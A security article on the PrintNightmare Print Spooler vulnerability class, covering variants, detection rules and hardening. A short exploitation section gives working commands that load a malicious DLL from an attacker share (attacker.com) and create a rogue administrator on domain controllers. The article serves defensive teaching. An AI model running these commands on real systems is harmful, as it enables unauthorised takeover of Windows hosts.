PrintNightmare in 2026: The Bug Class Microsoft Couldn’t Quite Kill

Last updated: April 26, 2026

PrintNightmare (CVE-2021-1675 / CVE-2021-34527) was disclosed in mid-2021. Microsoft has issued multiple patches. Print Nightmare was supposed to die. It did not. The bug class — Windows Print Spooler vulnerabilities allowing remote code execution and local privilege escalation — has produced new CVEs in 2022, 2023, 2024, and 2025. This article covers what PrintNightmare actually was, the variants since, the detection that catches each, and why “just disable Print Spooler on DCs” is the sensible answer almost everyone still has not implemented.

What the original bug was

Windows Print Spooler service (spoolsv.exe) lets users add printer drivers and print to remote printers. The function RpcAddPrinterDriverEx() allowed any authenticated user to install a printer driver — a DLL — that the spooler service (running as SYSTEM) then loaded.

From a low-privilege user, you could:

1. Place a malicious DLL on a network share you control
2. Call RpcAddPrinterDriverEx() against a target host (any Windows host with Print Spooler running)
3. The spooler service loads your DLL as SYSTEM

The catastrophic case: this works against Domain Controllers, which (by default) run Print Spooler. Any domain user could load a DLL on every DC, becoming SYSTEM on every DC. Game over.

The patches and their bypasses

Microsoft’s response over 2021-2022 was a sequence of partial fixes, each followed by a community-published bypass within days or weeks. The eventual fix required:

• Setting RestrictDriverInstallationToAdministrators=1 in registry
• Disabling Point and Print client behaviour
• For the safest case, disabling Print Spooler entirely

Many environments applied the early patches but not the later registry hardening. They are vulnerable to the bypasses.

The PrintNightmare family — variants since

SpoolFool (CVE-2022-21999)

Local privilege escalation. SetPrinter() RPC call writes to specific registry paths; combined with directory junction tricks, lets a low-privilege user write to SYSTEM-protected locations. February 2022.

Multiple 2023 variants

Quarterly Patch Tuesdays in 2023 fixed CVE-2023-21674, CVE-2023-21678, CVE-2023-28238, others — all Print Spooler issues, all enabling LPE or RCE.

2024 onwards

Print Spooler bugs continued through 2024 and 2025. As of 2026, Print Spooler remains an active research target. Multiple security researchers have stated they reliably find new bugs in it every quarter.

Why the bug class persists

Print Spooler is one of the oldest Windows services, written in C++ before modern memory safety practices, with extensive RPC surface, and integrated deeply into network protocols (SMB, DCOM, NTLM). Microsoft has rewritten parts of it multiple times. The architectural complexity makes complete remediation difficult.

Practical exploitation

From a domain-joined low-privilege account, the original PrintNightmare exploit (still works on partially-patched systems):

# Set up SMB share with malicious DLL
sudo impacket-smbserver evil /tmp/evil_share -smb2support

# From Windows attacker box, trigger:
.\\Invoke-Nightmare.ps1 -DriverName "Generic Driver" -NewUser "evil" -NewPassword "EvilPass1!"
# Or with python:
python3 CVE-2021-1675.py corp.local/alice:'Pass'@dc.corp.local '\\\\attacker.com\\evil\\evil.dll'

Result: a new local administrator on the target host (DC if you targeted one).

Detection — what works

Print Spooler exploitation is reasonably loud if you know what to look for:

• Event ID 808 in Microsoft-Windows-PrintService/Operational — driver installation events. Successful exploitation creates a clear log entry.
• Event ID 7045 in System log — service installation, often follows Print Spooler exploitation when the attacker installs a service for persistence.
• Sysmon Event 7 — DLL load by spoolsv.exe from non-standard paths (network shares, user temp directories) — high-fidelity.
• Sysmon Event 11 — file creation in C:\Windows\System32\spool\drivers\ or related directories by non-admin users.

Sigma rule:

title: PrintNightmare Exploitation
detection:
  selection:
    EventID: 7
    Image|endswith: '\\spoolsv.exe'
    ImageLoaded|contains:
      - '\\drivers\\x64\\3\\'
      - '\\printers\\drivers\\'
    ImageLoaded|re|contains:
      - '\\\\\\\\.*\\\\.*\.dll'  # UNC paths
  condition: selection

Mitigation

The actual fix, in priority order:

1. Disable Print Spooler on Domain Controllers. DCs do not need to print. Disable the service entirely. Verify with Get-Service Spooler.
2. Disable Print Spooler on critical servers (DBs, application servers, jump hosts) that do not need printing.
3. For workstations and print servers that need it: install latest cumulative update, then set the registry hardening:

   HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
   RestrictDriverInstallationToAdministrators = 1 (DWORD)

4. Restrict who can use Point and Print. The default lets any authenticated user install drivers; restrict to administrators.
5. Network segmentation. Print Spooler RPC should not be reachable from arbitrary network segments.

For a practical priority order across the fleet:

• Domain Controllers first (highest impact).
• Tier-0 admin workstations (Privileged Access Workstations).
• Critical servers (file servers, database servers, application servers).
• General workstation fleet last (lower exploit reach but largest count).

How to find your next Print Spooler-class bug

For attackers:

• Always check Print Spooler service state on every Windows target. Disabled = move on; running + unpatched = exploitation candidate.
• Track the latest spooler bug research — it does not stop. Subscribe to Will Dormann, Yaron Zinar, and known Windows-internals researchers’ feeds.
• Test the latest disclosed bug against your in-scope hosts; environments rarely patch on Day 1.

For defenders:

• Inventory Print Spooler service status across your Windows fleet. Hosts where it is enabled and not justified are remediation candidates.
• Audit registry hardening (RestrictDriverInstallationToAdministrators) on hosts where spooler must remain enabled.
• Add Sysmon Event 7 spool DLL detection to your SIEM. Validate it fires by running an Atomic Red Team simulation.

Compliance angle

• RBI Cyber Framework — vulnerability management with patching SLAs explicitly required for critical infrastructure.
• SEBI CSCRF — Print Spooler exploitation maps to MITRE T1068 (Privilege Escalation) and T1210 (Exploitation of Remote Services).
• DPDP §8(5) — known-vulnerable production systems are reasonable-security failures.

The takeaway

Print Spooler is the Windows service that should be disabled on every host that does not actively print. It is enabled by default, runs as SYSTEM, has a long history of remotely-exploitable RCE bugs, and continues to produce new CVEs regularly. The fix is operational discipline: inventory the service, disable where not needed, harden the rest. Domain Controllers running Print Spooler in 2026 is an organisational hygiene failure, not a technology problem. Audit your DCs today; if any have Print Spooler running, that is your highest-priority remediation.